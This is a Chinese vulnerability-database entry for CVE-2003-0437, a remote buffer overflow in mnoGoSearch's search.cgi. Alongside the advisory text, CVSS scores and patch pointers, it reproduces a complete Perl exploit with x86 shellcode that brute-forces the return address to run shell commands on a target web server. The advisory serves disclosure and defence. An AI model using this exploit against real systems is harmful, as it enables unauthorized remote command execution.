CVE-2003-0437
CVSS7.5
发布时间 :2003-07-24 00:00:00
修订时间 :2008-09-10 15:19:00
NMCOES    

[原文]Buffer overflow in search.cgi for mnoGoSearch 3.2.10 allows remote attackers to execute arbitrary code via a long tmplt parameter.


[CNNVD]MNOGoSearch search.cgi tmplt变量远程缓冲区溢出漏洞(CNNVD-200307-024)

        
        mnoGoSearch是一款多功能的基于WEB的搜索引擎。
        mnoGoSearch对用户提交的'tmplt'变量值缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        攻击者提供超过1024字节的字符串作为'tmplt'变量,可覆盖堆栈中任意地址,精心构建提交数据可能以WEB进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0437
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0437
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-024
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/7866
(VENDOR_ADVISORY)  BID  7866
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005543.html
(UNKNOWN)  FULLDISC  20030610 mnogosearch 3.1.20 and 3.2.10 buffer overflow

- 漏洞信息

MNOGoSearch search.cgi tmplt变量远程缓冲区溢出漏洞
高危 边界条件错误
2003-07-24 00:00:00 2005-10-20 00:00:00
远程  
        
        mnoGoSearch是一款多功能的基于WEB的搜索引擎。
        mnoGoSearch对用户提交的'tmplt'变量值缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        攻击者提供超过1024字节的字符串作为'tmplt'变量,可覆盖堆栈中任意地址,精心构建提交数据可能以WEB进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        mnoGoSearch
        -----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        mnoGoSearch mnoGoSearch 3.2.10:
        mnoGoSearch Upgrade mnoGoSearch CVS
        
        http://www.mnogosearch.org/download.html

- 漏洞信息 (41)

mnoGoSearch 3.1.20 Remote Command Execution Exploit (EDBID:41)
linux remote
2003-06-10 Verified
80 pokleyzz
N/A [点击下载]
#!/usr/bin/perl
# 
# [ reloaded ] 
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#

use IO::Socket;

$host = "127.0.0.1";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;


if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
	print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
                         (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
	 	
}

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;
}

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));
    		
	}	
	
}

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";
	}	
}

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
	             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	             ."\x41\x41"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	&connect_to;
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
	}
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	&exploit($rawret);
	&check_result;
	if ($success == 1){
		exit;
	}
	sleep 1;
}

# milw0rm.com [2003-06-10]
		

- 漏洞信息

11873
mnoGoSearch search.cgi tmplt Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-11 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

MNOGoSearch Search.CGI TMPLT Buffer Overflow Vulnerability
Boundary Condition Error 7866
Yes No
2003-06-10 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to pokleyzz <pokleyzz@scan-associates.net>.

- 受影响的程序版本

mnoGoSearch mnoGoSearch 3.2.10

- 漏洞讨论

mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

- 漏洞利用

The following proof of concept exploit has been supplied:

- 解决方案

The vendor has addressed this issue in the current version of this software and a fix is available at the cvs repository for this product:


mnoGoSearch mnoGoSearch 3.2.10

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站